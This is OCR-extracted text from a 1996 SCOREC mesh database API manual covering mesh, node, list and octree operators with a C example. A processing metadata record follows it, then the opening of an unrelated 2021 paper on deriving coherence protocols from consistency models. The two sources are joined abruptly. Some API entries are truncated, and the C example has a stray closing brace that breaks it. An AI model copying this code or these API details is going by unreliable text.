Sets a single parameter value for point. To be used if point is on a mesh entity classified on a model edge.
P_setParam2 void P_setParam2(pPoint point, double r, double s, int patch)
Sets two parameter values (and an integer patch indicator) for point. To be used if point is on a mesh entity classified on a model face.
2.8 Node Operators
These operators are for manipulating nodes. For operators to set and retrieve nodes on mesh entities see Section 2.2.1 on page 7. Note that a node itself does not have coordinates, nodes that are associated with a point on an entity have the location of the point on the entity with which they are associated.
N_new pNode N_new(void)
Creates a new node.
N_num int N_num(pNode node)
Return the number associated with node.
N_setNum void N_setNum(pNode node, int n)
Sets the number associated with node to n.
N_delete void N_delete(pNode node)
Deletes node. This does not delete any references to the node, just the node itself.
N_whatIn
2.9 Model Operators
The term model is used to refer to a datatype that is either a topological representation of a mesh or of a geometric model. If an argument is specified to be a pModel then either a pMesh or a pGModel can be passed.
**MM_new**
\textit{pMesh MM\_new(int type, GMODEL model)}
\textit{MM\_NEW(INTEGER type, GMODEL model, MESH mesh)}
Creates a new mesh based on \textit{type} that is classified on \textit{model}.
- \textit{type}: pass a 0 (zero) for this argument if the mesh will not be modified, pass 1 if the mesh will be modified (this will create a dynamic data structure for the mesh and make all of the entities in the mesh dynamic, this option does require more memory to store the mesh).
- \textit{model}: object returned by operator GM\_new(). You may pass a 0 (zero) if there is no model associated with the mesh (operators returning classification information should not be called in this case). The model must be loaded using M\_load before the mesh is loaded although the model may be loaded after it is passed to MM\_new.
**GM_new**
\textit{pGModel GM\_new(int type)}
Creates a new geometric model based on \textit{type}.
- \textit{type}: pass a 0 (zero) for this argument.
**M_delete**
\textit{void M\_delete(pModel model)}
Deletes the object \textit{model} and releases all memory associated with it. All entities on \textit{model} are also deleted.
**M_load**
\textit{int M\_load(pModel model, char *filename)}
Loads a model from the file \textit{filename}. The only currently supported file formats are the SCOREC mesh or model format which are generally indicated by a .smd or .smd extension, respectively. The file extension is part of \textit{filename}. The return value is zero if the specified file could not be opened, non-zero otherwise.
**M_writeSMS**
\textit{void M\_writeSMS(pMesh mesh, char *filename, char *program)}
Writes out a file in the SCOREC mesh format for the given \textit{mesh}. The \textit{filename} is the full name of the file that will be written (i.e. a .sms is not
appended to the name given). \texttt{program} should be the name of the program that is writing out the mesh file, this name is written to the \texttt{.smf} file. The string \texttt{program} may have no space characters.
\begin{verbatim}
M_writeDXFile void M_writeDXFile(pMesh mesh, char *name)
***
M_nRegion int M_nRegion(pModel model)
M_nFace int M_nFace(pModel model)
M_nEdge int M_nEdge(pModel model)
M_nVertex int M_nVertex(pModel model)
M_nPoint int M_nPoint(pModel model)
Each of the above operators return the number of the appropriate entities that are on \texttt{model}.
M_nextRegion pRegion M_nextRegion(pModel model, void **flag)
M_nextFace pFace M_nextFace(pModel model, void **flag)
M_nextEdge pEdge M_nextEdge(pModel model, void **flag)
M_nextVertex pVertex M_nextVertex(pModel model, void **flag)
M_nextPoint pPoint M_nextPoint(pModel model, void **flag)
Each of the above operators when called repeatedly will return each of the appropriate type of entity in the model. To initialize the operators to the first entity in the mesh \texttt{flag} must be set to point to a null value. When the operator is called for the entity after the last one in the model it will return a null value. An example of using these operators is below.
\begin{verbatim}
pRegion region;
void *temp = 0;
while ( region = M_nextRegion(mesh, &temp) ) {
... do something ...
}
\end{verbatim}
\textit{Important:} the operators below should be avoided if at all possible (the \texttt{M\_next*} operators should be used instead), it can be very inefficient, especially in the case of dynamic models.
\begin{verbatim}
M_region pRegion M_region(pModel model, int n)
M_face pFace M_face(pModel model, int n)
M_edge pEdge M_edge(pModel model, int n)
M_vertex pVertex M_vertex(pModel model, int n)
M_point pPoint M_point(pModel model, int n)
Each of the above operators return the \texttt{n}^{th} entity of the given type on \texttt{model}. Note: the first entity is \texttt{n}=0. These operators should generally not be used and the \texttt{M\_next*} operators should be used in their place.
\texttt{n}: index of entity on \texttt{model}.
\end{verbatim}
Note: the M_next operators should be used instead of these operators to loop through all the entities in the model. It is possible for these operators to be very inefficient, especially in the case of dynamic models.
2.10 Mesh Operators
These operators operate only on meshes. They may be used if a mesh if static or dynamic.
**MM_makeNodes**
```c
void MM_makeNodes(pMesh mesh, nodeType type)
```
Create nodes on the mesh corresponding to a specific type of node pattern (which determines which entities the nodes are created on).
- **type**: Valid types are (numerical values in parenthesis should be passed if calling from Fortran):
- MM_isoparametric (0): creates a node at each vertex and one associated with each point on any other entities.
**MM_nNode**
```c
int MM_nNode(pMesh mesh)
```
Returns the number of nodes on mesh.
**MM_addNode**
```c
void MM_addNode(pMesh mesh, pNode node)
```
Adds a node to the mesh. This operators just registers that the given node is a part of the mesh it does not affect any of the information about that node.
**MM_nextNode**
```c
pNode MM_nextNode(pMesh mesh, void **flag)
```
This operator, when called repeatedly will return each of the nodes in the mesh. To initialize the operator to the first node in the mesh flag must be set to point to a null value. An example of using this operator is below.
```c
pNode node;
void *temp = 0;
while ( node = MM_nextNode(mesh, &temp )){
... do something ...
}
```
**MM_removeNode**
```c
void MM_removeNode(pMesh mesh, pNode node)
```
Deletes the node from mesh.
3.0 Database Modification Operators
The following operators are used to modify the information in the mesh database. They may only be used if a dynamic mesh has been created.
3.1 Region Operators
R_setWhatIn
void R_setWhatIn(pRegion region, pEntity model_entity)
Set the classification of region to model_entity.
3.2 Face Operators
F_setWhatIn
void F_setWhatIn(pFace face, pGEntity what)
Set the classification of face to what.
F_chDir
void F_chDir(pFace face)
Flips face so that its positive normal is pointing in the opposite direction. This operator updates all of the entities adjacent to face to reflect this change (the direction that the face is being used by any regions is reversed and the direction that it is using any edges is reversed).
3.3 Edge Operators
E_setWhatIn
void E_setWhatIn(pEdge edge, pGEntity what)
Set the classification of edge to what.
E_setNpoint
void E_setNpoint(pEdge edge, int n)
Set the number of points on edge to n. Currently this operator does nothing and there is a limit of one point per edge. However this operator should be called to assure compatibility with future versions of the mesh database that will not have the above assumption.
E_setPoint
void E_setPoint(pEdge edge, pPoint pt)
Set point pt to be on edge.
3.4 Vertex Operators
V_setWhatIn
void V_setWhatIn(pVertex vertex, GEntity what)
Set the classification of vertex to be on what.
V_setPoint
void V_setPoint(pVertex vertex, pPoint pt)
Set the point associated with \texttt{vertex} to be \texttt{pt}. There can only be one point associated with a vertex.
### 3.5 Point Operators
**P\_new**
\texttt{P\_new} \hspace{1cm} \textit{pPoint P\_new(void)}
Create a new point.
**P\_delete**
\texttt{void P\_delete(pPoint point)}
Delete point. This operator should not be called if the point is part of a mesh (i.e. if it has been attached to a mesh using the \texttt{M\_addPoint} operator). In this case the \texttt{M\_removePoint} operator should be called instead so that the mesh knows that the point has been deleted.
### 3.6 Model Operators
The term model is used to refer to a datatype that is either a topological representation of a mesh or of a geometric model. Where an argument of type \texttt{pModel} is given either a \texttt{pMesh} or a \texttt{pGModel} may be passed.
**M\_removeRegion**
\texttt{void M\_removeRegion(pModel model, pRegion region)}
**M\_removeFace**
\texttt{void M\_removeFace(pModel model, pFace region)}
**M\_removeEdge**
\texttt{void M\_removeEdge(pModel model, pEdge region)}
**M\_removeVertex**
\texttt{void M\_removeVertex(pModel model, pVertex region)}
**M\_removePoint**
\texttt{void M\_removePoint(pModel model, pPoint region)}
Deletes the appropriate entity from the model and updates the entities pointing to the deleted entity.
### 3.7 Mesh Operators
These operators operate only on meshes.
**MM\_createR**
\texttt{pRegion MM\_createR(pMesh mesh, int nFace, pFace \*faces, int \*dirs, pGEntity gent)}
Returns a new region in the given \texttt{mesh}.
\textbf{\texttt{nFace}}: number of faces that define the region
\textbf{\texttt{faces}}: array (size=\texttt{nFace}) of faces bounding the region
\textbf{\texttt{dirs}}: array (size=\texttt{nFace}) of integers indicating the direction each face in \texttt{faces} is being used by the region (1=positive direction, 0 = negative direction)
\textbf{\texttt{gent}}: entity in the geometric model that this region is classified on
**MM_createF**
```c
pFace MM_createF(pMesh mesh, int nEdge, pEdge *edges, int *dirs,
pGEntity gent)
```
Returns a new face in the given mesh.
- **nEdge**: number of edges that define the face
- **edges**: array (size=nEdge) of edges bounding the face. The edges in this array should be given in order around the face.
- **dirs**: array (size=nEdge) of integers indicating the direction each edge in edges is being used by the face (1=positive direction, 0 = negative direction).
- **gent**: entity in the geometric model that this face is classified on
**MM_createE**
```c
pEdge MM_createE(pMesh mesh, pVertex v1, pVertex v2, pGEntity gent)
```
Returns a new edge in the given mesh.
- **v1, v2**: the two vertices bounding the edge
- **gent**: entity in the geometric model that this edge is classified on
**MM_createVP**
```c
pVertex MM_createVP(pMesh mesh, double x, double y, double z,
double *param, int unused, pGEntity gent)
```
Creates a new vertex and point in the given mesh. Returns only the vertex.
- **x,y,z**: spatial location of the vertex
- **param**: array containing the parametric location of the vertex on the entity it is classified on, *ent*. Size of this array equals the dimension of the parametric space (1 if *ent* is an edge, 2 if a face). Not used (pass 0) for vertices classified on a vertex or a region.
- **unused**: unused parameter - pass 0.
- **gent**: entity in the geometric model that this vertex is classified on
4.0 Utility Operators
4.1 pList Operators
A pList is a datatype that allows the manipulation of arbitrary length lists of Entities. The following operators are defined for pLists.
**PList_new**
```cpp
pList PList_new(void)
```
Creates a new pList.
**PList_delete**
```cpp
void PList_delete(pList list)
```
Deletes list. Does not delete the entities that are in list.
**PList_append**
```cpp
pList PList_append(pList list, pEntity item)
```
Appends item to list.
**PList_appUnique**
```cpp
pList PList_appUnique(pList list, pEntity item)
```
Appends item to list only if item is not already in list. This operator is less efficient than PList_append since it must search the list before adding the item.
**PList_size**
```cpp
int PList_size(pList list)
```
Returns the number of items in the list.
**PList_item**
```cpp
pEntity PList_item(pList list, int n)
```
Returns the n\(^{th}\) item in list. The first item in the list is n=0.
**PList_remItem**
```cpp
void PList_remItem(pList list, pEntity item)
```
Removes the given item from the list.
**PList_next**
**PList_clear**
5.0 Octree Operators
These operators are a preliminary set of operators for accessing octant information that is related to the mesh. Although the operators exist, the data that the operators use is not currently automatically loaded into the database. If you desire to use these operators please contact me (See “Getting Help/Reporting Problems” on page 3.)
5.1 Octant Operators
An octant has been implemented as a type of pEntity. Therefore in addition to the operators listed here any of the operators listed in “General Entity Operators” on page 6 may be used.
When child octants are referred to by number, the numbering shown in the figure below is to be used.
\[ \text{FIGURE 4. Child octant numbering} \]
\[ \text{OC\_new} \]
\[ \text{pOctant OC\_new(pOctant parent, int whichChild)} \]
Creates a new Octant. If the parent of the octant is given OC\_setChild will be called for the parent octant to notify the parent that the new octant is it’s child. The level of the new octant will be set to one greater than it’s parent. The range for whichChild is 0 to 7. To create a root octant pass 8 for whichChild and the octree that the octant is the root of for parent.
\[ \text{OC\_delete} \]
\[ \text{void OC\_delete(pOctant octant)} \]
Deletes octant. If octant is terminal removes the association of the octanta with the entities that were inside of it. If octant is non-terminal, recursively descends the tree, deleteing everything below octant by calling OC_delete on each child.
**OC_parent**
\[ pOctant OC\_parent(pOctant octant) \]
Returns the parent octant of the given octant.
**OC_child**
\[ pOctant OC\_child(pOctant octant, int n) \]
Returns the \( n^{th} \) child of octant. \( n \) must be between 0 and 7. Returns null if octant is a terminal octant.
**OC_children**
\[ int OC\_children(pOctant, pOctant *children) \]
Fills the array, which must be at least of size 8, with the children of the octant.
**OC_setChild**
\[ void OC\_setChild(pOctant, pOctant child, int n) \]
Stores \( child \) as a the \( n^{th} \) child octant of the given octant.
**OC_deleteCh**
\[ void OC\_deleteCh(pOctant) \]
Deletes the child octants of the given octant. Does nothing if the octant is a terminal octant. If the child octants are not terminal also deletes their children. The list of entities set up by previous calls to OC_setEnt will be deleted from any octants before the octant is deleted. Any data attached with EN_attachData should be removed before an octant is deleted or memory could be leaked.
**OC_level**
\[ int OC\_level(pOctant octant) \]
Returns the level of octant in the octree. The root octant is level 0.
**OC_numDown**
\[ int OC\_numDown(pOctant) \]
Returns the number of octants in the tree below the given octant. The number returned does not include the given octant.
**OC_isTerminal**
\[ int OC\_isTerminal(pOctant) \]
Returns 1 if the octant is a terminal octant, 0 otherwise.
**OC_bounds**
\[ void OC\_bounds(pOctant octant, double min[3], double max[3]) \]
Returns the coordinates of the two extreme corners of octant. \( min \) is the corner that has the minimum \( x, y \) and \( z \) values, \( max \) is the opposite corner.
OC_origin
void OC_origin(pOctant octant, double origin[3])
Returns the origin of octant. origin is the coordinates of the point in the center of the octant.
OC_numEnt
int OC_numEnt(pOctant)
Returns the number of mesh entities in a terminal octant. Returns -1 if the octant is not a terminal octant. The number of entities is the number of regions only in a solid mesh (i.e. the faces, edges, etc. are not included). In a shell mesh it is the number of faces. In a mixed solid/shell mesh it is the number of regions plus the number of "shell" faces.
OC_setNumEnt
void OC_setNumEnt(pOctant, int n)
Sets the number of mesh entities that are in a terminal octant. The number of entities is the number of regions only in a solid mesh (i.e. the faces, edges, etc. should not be included). In a shell mesh it would be the number of faces. In a mixed solid/shell mesh it would be the number of regions plus the number of "shell" faces.
OC_setEntity
void OC_setEntity(pOctant, pEntity ent, int n)
Sets ent to be the \( n^{th} \) mesh entity in the given terminal octant.
OC_entity
pEntity OC_entity(pOctant octant, int n)
Returns the \( n^{th} \) mesh entity in octant. Returns null if octant is not terminal.
5.2 Octree Operators
OT_new
pOctree *OT_new(pMesh mesh)
Creates a new octree object. mesh is the pMesh object that this octree is associated with. The mesh must have already been created and loaded before the octree is loaded using OT_load().
OT_delete
void OT_delete(pOctree octree)
Deletes octre, including all of the octants in the octree.
OT_load
void OT_load(pOctree, char *filename)
Loads an octree object from the file filename. The filename should be the full file name of the file that contains the octree information (including the .soc extension if there is one).
<table>
<thead>
<tr>
<th>Function</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>OT_write</td>
<td>void OT_write(pOctree octree, char *filename, char *progname)</td>
</tr>
<tr>
<td></td>
<td>Writes octree to a file called filename (the extension that is used to denote this info is .soc, this extension must be passed as a part of filename). progname is a string containing the name of the program writing the file.</td>
</tr>
<tr>
<td>OT_root</td>
<td>pOctant OT_root(pOctree)</td>
</tr>
<tr>
<td></td>
<td>Returns the root octant of the octree.</td>
</tr>
<tr>
<td>OT_setOrigin</td>
<td>void OT_setOrigin(pOctree, double x, double y, double z)</td>
</tr>
<tr>
<td></td>
<td>Sets the origin of the octree to x,y,z.</td>
</tr>
<tr>
<td>OT_setRoot</td>
<td>void OT_setRoot(pOctree, pOctant root)</td>
</tr>
<tr>
<td></td>
<td>Sets the root octant of the octree to root.</td>
</tr>
<tr>
<td>OT_setSize</td>
<td>void OT_setSize(pOctree, double x, double y, double z)</td>
</tr>
<tr>
<td></td>
<td>Set the size of the octree (i.e. the size of the root octant) to x,y,z.</td>
</tr>
</tbody>
</table>
6.0 Example Code
This section provides code examples to demonstrate the use of the mesh database.
6.1 Example 1
This example code loops through all the regions in a mesh and prints out the classification of each vertex and node numbers of all the nodes on each region.
```c
#include "MSops.h"
#include <stdio.h>
void printRegionInfo(pRegion region);
void main(void)
{
pMesh mesh;
pGModel model;
pRegion region;
int i;
long nr,nf,ne,nv,np;
void *temp=0;
MD_init(); /* initialize the mesh database */
model = GM_new(0); /* make a geometric model object */
mesh = MM_new(0,model); /* make a mesh object */
M_load(model,"test.smd"); /* load the model from the file test.smd */
M_load(mesh,"test.sms"); /* load the mesh from the file test.sms */
MM_makeNodes(mesh,MM_isoparametric);
nr = M_nRegion(mesh); /* get the number of regions, faces, edges, */
nf = M_nFace(mesh); /* and vertices in the mesh */
ne = M_nEdge(mesh);
nv = M_nVertex(mesh);
np = M_nPoint(mesh);
printf("Number of:\n\nRegions: %ld\nFaces: %ld\nEdges: %ld\nVertices: %ld\nPoints: %ld",nr,nf,ne,nv,np);
for(i=0; i<nr; i++) { /* loop through all the regions in the mesh */
region = M_nextRegion(mesh,&temp); /* temp=0 to get first region */
printRegionInfo(region); /* do something with the region */
}
}
M_delete(mesh); /* delete the mesh object (and all mesh entities) */
M_delete(model); /* delete the model object */
MD_exit(); /* close the mesh database */
}
void printRegionInfo(pRegion region)
{
int j,numface,size;
pFace face;
pPList list;
pVertex vertex;
pNode node;
pEntity gent;
list = R_vertices(region); /* get a list of all the vertices on region */
for(j=0; j < PList_size(list); j++) {
/* loop over list */
vertex = PList_item(list,j); /* get the j'th vertex */
gent = V_whatsIn(vertex); /* get the classification of vertex */
printf("\tVertex %d: whatin: %d, type: %d, ",
j,MD_tag(gent),EN_type(gent));
node = EN_node(vertex,0); /* get node on vertex */
printf(" Node: %d\n",N_num(node)); /* get the node number */
}
printf("\n");
PList_delete(list); /* delete the list when we're done */
}
7.0Deprecated Operators
These operators should not be used for any new code and old code using them should be updated to use other operators. These operators will be removed in a future version of the mesh database. The operators that should be used instead are given after Use:
R_new
\[ pRegion \, R\_new(int \, type) \]
Creates a new pRegion based on type.
Use: MM_createR
R_delete
\[ void \, R\_delete(pRegion \, region) \]
Deletes \( \text{region} \). Does not remove the reference to the region on the faces that bound \( \text{region} \). This operator should not be called if the region is part of a mesh (i.e. if it has been attached to a mesh using the M_addRegion operator). In this case the M_removeRegion operator should be called instead so that the mesh knows that the region has been deleted.
Use: M_removeRegion
R_setNface
\[ void \, R\_setNface(pRegion \, region, \, int \, n) \]
Set the number of faces on \( \text{region} \). This operator must be called after creating a region before attaching any faces to the region.
Use: MM_createR
R_setFace
\[ void \, R\_setFace(pRegion \, region, \, pFace \, face, \, int \, dir) \]
Attach \( \text{face} \) to \( \text{region} \). \( \text{dir} \) is the direction that region is using the face. \( \text{dir} = 1 \) means that the face is being used such that it's normal is pointed outside the region. This operator also sets \( \text{face} \) to point to \( \text{region} \).
Use: MM_createR
F_new
\[ pFace \, F\_new(eSubType \, type) \]
Create a new face of type \( \text{type} \).
Use: MM_createF
F_delete
\[ void \, F\_delete(pFace \, face) \]
Deletes \( \text{face} \). Does not remove the reference to the face on the edges that bound the \( \text{face} \). This operator should not be called if the face is part of a mesh (i.e. if it has been attached to a mesh using the M_addFace
operator). In this case the M_removeFace operator should be called instead so that the mesh knows that the face has been deleted.
Use: **M_removeFace**
**F_setEdge**
void F_setEdge(pFace face, pEdge edge, int dir)
Attach edge to face. dir is the direction that face is using edge. dir = 1 means that the edge is being used in the direction that it was defined, from the first vertex to the second vertex of the edge. Edges must be added to the face in the direction of the loop that defines the face.
Use: **MM_createF**
**F_setNedge**
void F_setNedge(pFace face, int n)
Set the number of edges on face. It is not necessary to call this operator for dynamic faces (it will do nothing in that case). For static faces this operator must be called before attaching edges to the face.
Use: **MM_createF**
**E_new**
pEdge E_new(eSubType type)
Creates a new face of type type.
Use: **MM_createE**
**E_delete**
void E_delete(pEdge edge)
Deletes edge. Does not remove the reference to the edge on the vertices on the edge. This operator should not be called if the edge is part of a mesh (i.e. if it has been attached to a mesh using the M_addEdge operator). In this case the M_removeEdge operator should be called instead so that the mesh knows that the edge has been deleted.
Use: **M_removeEdge**
**E_setVertex**
void E_setVertex(pEdge edge, pVertex vertex1, pVertex vertex2)
Sets the vertices on edge to vertex1 and vertex2. The positive direction of the edge is taken to be from vertex1 to vertex2.
Use: **MM_createE**
**E_setNface**
void E_setNface(pEdge edge, int n)
Sets the number of faces using edge. It is not necessary to call this operator for a dynamic edge (it will do nothing in that situation). For a static
edge this operator must be called before the edge is used in any face definitions.
Use: No longer needed
**V_new**
pVertex V_new(eSubType type)
Create a new vertex of type type.
**V_delete**
void V_delete(pVertex vertex)
Deletes vertex. This operator should not be called if the vertex is part of a mesh (i.e. if it has been attached to a mesh using the M_addVertex operator). In this case the M_removeVertex operator should be called instead so that the mesh knows that the vertex has been deleted.
**V_setNedge**
void V_setNedge(pVertex vertex, int n)
Set the number of edges using vertex to n. This operator does not need to be called for dynamic vertices, it must be called for static vertices before the vertex is used to define any edges.
**M_addRegion**
void M_addRegion(pModel model, pRegion region)
**M_addFace**
void M_addFace(pModel model, pFace region)
**M_addEdge**
void M_addEdge(pModel model, pEdge region)
**M_addVertex**
void M_addVertex(pModel model, pVertex region)
**M_addPoint**
void M_addPoint(pModel model, pPoint region)
Adds the appropriate entity to the model. This operator just registers that the given entity is a part of the model it does not affect any of the information about that entity.
Use: MM_createR, MM_createF, MM_createE, MM_createVP - automatically add the newly created entity to the mesh, no call is needed.
|
{"Source-Url": "https://scorec.rpi.edu/REPORTS/1996-18.pdf", "len_cl100k_base": 13148, "olmocr-version": "0.1.53", "pdf-total-pages": 34, "total-fallback-pages": 0, "total-input-tokens": 38862, "total-output-tokens": 15221, "length": "2e13", "weborganizer": {"__label__adult": 0.0002810955047607422, "__label__art_design": 0.0005373954772949219, "__label__crime_law": 0.00024259090423583984, "__label__education_jobs": 0.000911235809326172, "__label__entertainment": 8.296966552734375e-05, "__label__fashion_beauty": 0.00014913082122802734, "__label__finance_business": 0.0002149343490600586, "__label__food_dining": 0.0002799034118652344, "__label__games": 0.0010614395141601562, "__label__hardware": 0.001750946044921875, "__label__health": 0.00032401084899902344, "__label__history": 0.0003008842468261719, "__label__home_hobbies": 0.0001327991485595703, "__label__industrial": 0.0005846023559570312, "__label__literature": 0.00021409988403320312, "__label__politics": 0.00015854835510253906, "__label__religion": 0.0004658699035644531, "__label__science_tech": 0.058380126953125, "__label__social_life": 8.022785186767578e-05, "__label__software": 0.01959228515625, "__label__software_dev": 0.91357421875, "__label__sports_fitness": 0.00026917457580566406, "__label__transportation": 0.000400543212890625, "__label__travel": 0.0001800060272216797}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 50150, 0.01331]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 50150, 0.44746]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 50150, 0.80826]], "google_gemma-3-12b-it_contains_pii": [[0, 166, false], [166, 166, null], [166, 2232, null], [2232, 4760, null], [4760, 6149, null], [6149, 6149, null], [6149, 8186, null], [8186, 10059, null], [10059, 12035, null], [12035, 14124, null], [14124, 16027, null], [16027, 17033, null], [17033, 18956, null], [18956, 20167, null], [20167, 22221, null], [22221, 23387, null], [23387, 24750, null], [24750, 26799, null], [26799, 28951, null], [28951, 30521, null], [30521, 30521, null], [30521, 31988, null], [31988, 33991, null], [33991, 35460, null], [35460, 36561, null], [36561, 37812, null], [37812, 39761, null], [39761, 41561, null], [41561, 42843, null], [42843, 44230, null], [44230, 45154, null], [45154, 47030, null], [47030, 48777, null], [48777, 50150, null]], "google_gemma-3-12b-it_is_public_document": [[0, 166, true], [166, 166, null], [166, 2232, null], [2232, 4760, null], [4760, 6149, null], [6149, 6149, null], [6149, 8186, null], [8186, 10059, null], [10059, 12035, null], [12035, 14124, null], [14124, 16027, null], [16027, 17033, null], [17033, 18956, null], [18956, 20167, null], [20167, 22221, null], [22221, 23387, null], [23387, 24750, null], [24750, 26799, null], [26799, 28951, null], [28951, 30521, null], [30521, 30521, null], [30521, 31988, null], [31988, 33991, null], [33991, 35460, null], [35460, 36561, null], [36561, 37812, null], [37812, 39761, null], [39761, 41561, null], [41561, 42843, null], [42843, 44230, null], [44230, 45154, null], [45154, 47030, null], [47030, 48777, null], [48777, 50150, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 50150, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 50150, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 50150, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 50150, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 50150, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 50150, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 50150, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 50150, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 50150, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 50150, null]], "pdf_page_numbers": [[0, 166, 1], [166, 166, 2], [166, 2232, 3], [2232, 4760, 4], [4760, 6149, 5], [6149, 6149, 6], [6149, 8186, 7], [8186, 10059, 8], [10059, 12035, 9], [12035, 14124, 10], [14124, 16027, 11], [16027, 17033, 12], [17033, 18956, 13], [18956, 20167, 14], [20167, 22221, 15], [22221, 23387, 16], [23387, 24750, 17], [24750, 26799, 18], [26799, 28951, 19], [28951, 30521, 20], [30521, 30521, 21], [30521, 31988, 22], [31988, 33991, 23], [33991, 35460, 24], [35460, 36561, 25], [36561, 37812, 26], [37812, 39761, 27], [39761, 41561, 28], [41561, 42843, 29], [42843, 44230, 30], [44230, 45154, 31], [45154, 47030, 32], [47030, 48777, 33], [48777, 50150, 34]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 50150, 0.01655]]}
|
olmocr_science_pdfs
|
2024-12-08
|
2024-12-08
|
84dbc2ae8ca9113522158a6768786b28ff8638a4
|
Towards the Synthesis of Coherence/Replication Protocols from Consistency Models via Real-Time Orderings
Citation for published version:
Digital Object Identifier (DOI):
10.1145/3447865.3457964
Link:
Link to publication record in Edinburgh Research Explorer
Document Version:
Peer reviewed version
Published In:
Proceedings of the 8th Workshop on Principles and Practice of Consistency for Distributed Data (PaPoC '21)
General rights
Copyright for the publications made accessible via the Edinburgh Research Explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights.
Take down policy
The University of Edinburgh has made every reasonable effort to ensure that Edinburgh Research Explorer content complies with UK legislation. If you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim.
Towards the Synthesis of Coherence/Replication Protocols from Consistency Models via Real-Time Orderings
Vasilis Gavrilatos, Vijay Nagarajan, Panagiota Fatourou*
The University of Edinburgh, * University of Crete & FORTH-ICS
FirstName.LastName@ed.ac.uk, * faturu@csd.uoc.gr
Abstract
This work focuses on shared memory systems with a read-write interface (e.g., distributed datastores or multiprocessors). At the heart of such systems resides a protocol responsible for enforcing their consistency guarantees. Designing a protocol that correctly and efficiently enforces consistency is a very challenging task. Our overarching vision is to automate this task. In this work we take a step towards this vision by establishing the theoretical foundation necessary to automatically infer a protocol from a consistency specification. Specifically, we propose a set of mathematical abstractions, called real-time orderings (rt-orderings), that model the protocol. We then create a mapping from consistency guarantees to the minimal rt-orderings that enforce the guarantees. Finally, we informally relate the rt-orderings to protocol implementation techniques. Consequently, rt-orderings serve as an intermediate abstraction between consistency and protocol design, that enables the automatic translation of consistency guarantees into protocol implementations.
CCS Concepts • Computer systems organization → Cloud computing; Multicore architectures; • Software and its engineering → Consistency.
Keywords Consistency; Coherence; Replication; Synthesis;
1 Introduction
This work focuses on “shared memory” systems that provide a read/write interface to the programmer. Such systems are ubiquitous in both computer architecture and distributed systems. Prominent examples include shared memory multiprocessors (SMPs), GPUs, NoSQL Databases [1], coordination services[9], and software-based DSMs [10].
Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than ACM must be honored. Abstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from permissions@acm.org.
PaPoC’21, April 26, 2021, Online, United Kingdom © 2021 Association for Computing Machinery. ACM ISBN 978-1-4503-8338-7/21/04... $15.00 https://doi.org/10.1145/3447865.3457964
Figure 1: a) The producer-consumer synchronization pattern mandates that if P2 reads P1’s write to y, then it must also read P1’s write to x. b) The independent-reads independent-writes (IRIW) pattern mandates that if P2 sees P1’s writes but not P3’s and P4 sees P3’s write, then P4 must see P1’s write.
Such systems commonly replicate data – sometimes for performance (through caching), sometimes for fault tolerance and sometimes for both. To enable reasoning in the presence of replication, a memory consistency model (MCM) is specified as part of the system’s interface, providing the rules that dictate what values a read can return. In order to enforce the MCM, the system deploys a protocol which ensures that the replicas behave in accordance to the MCM. This protocol is called coherence protocol in computer architecture and replication protocol in distributed systems. We simply refer to it as the protocol.
The MCM specifies the behaviour of the system when executing parallel programs by enumerating all patterns through which parallel programs can synchronize. For example, an MCM CMa can guarantee the synchronization pattern of Figure 1a (commonly known as “producer-consumer”). Specifically, in Figure 1a, process P1 writes object x and then y, while process P2 reads y and then x. CMa guarantees that if P2’s read to y returns the write of P1, then P2’s read to x will also return the write of P1 (i.e., x = 1).
The MCM is thus a contract between the programmers and the designers. While programmers must understand the behaviour of the system, the designers must understand how to implement that behaviour. Problematically, enforcing the MCM is very challenging. For instance, consider two well known MCMs: TSO [18] and Causal Consistency (CC) [19]. TSO enforces both Figure 1a and b while CC enforces Figure 1a but not b. Given this information, how is the designer to implement a correct and efficient protocol for either MCM? Crucially, how is the designer to differentiate between the two models? E.g., how can one exploit that Figure 1b need not be enforced in the CC protocol?
Our overarching vision is to automate the above task: given a target MCM we envision a software tool that can produce an efficient protocol. We argue that to create this tool we need one additional level of abstraction which can act as an intermediary between the MCM and the protocol. That is: (1) we must be able to automatically translate any MCM to this abstraction; and (2) we must also be able to map the abstraction itself into protocol design choices. In this work, we take a step towards actualizing our vision, by proposing such an abstraction and, most crucially, presenting the mapping from MCMs to this abstraction. We also informally relate the abstraction to protocol design choices.
To create this abstraction, we observe that a shared memory system, be it a multiprocessor or a geo-replicated Key-Value Store (KVS), can be abstracted through the model of Figure 2, which depicts a set of processes executing a parallel program. Each process inserts its memory operations to a structure we call the reorder buffer (ROB), allocating one ROB entry per operation. The memory system executes the operations it finds in the ROB and writes back the response of each operation in-place in its dedicated entry.
